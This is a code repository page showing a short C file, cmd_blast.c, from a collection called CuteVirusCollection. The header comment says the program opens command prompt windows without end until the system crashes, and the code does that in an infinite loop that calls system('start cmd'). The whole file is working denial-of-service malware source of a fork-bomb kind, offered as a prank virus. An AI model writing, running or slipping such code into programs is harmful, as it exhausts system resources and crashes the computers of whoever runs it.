Files
CuteVirusCollection/cmd_blast.c
Minhas Kamal 9d312c87d0 cmd blast
2016-11-16 18:52:38 +06:00

14 lines
212 B
C

/**
* Developer: Minhas Kamal
* Functionality: Opens an infinite number of command prompt
* window till the system crushes.
**/
#include <stdlib.h>
main(){
while(1){
system("start cmd");
}
}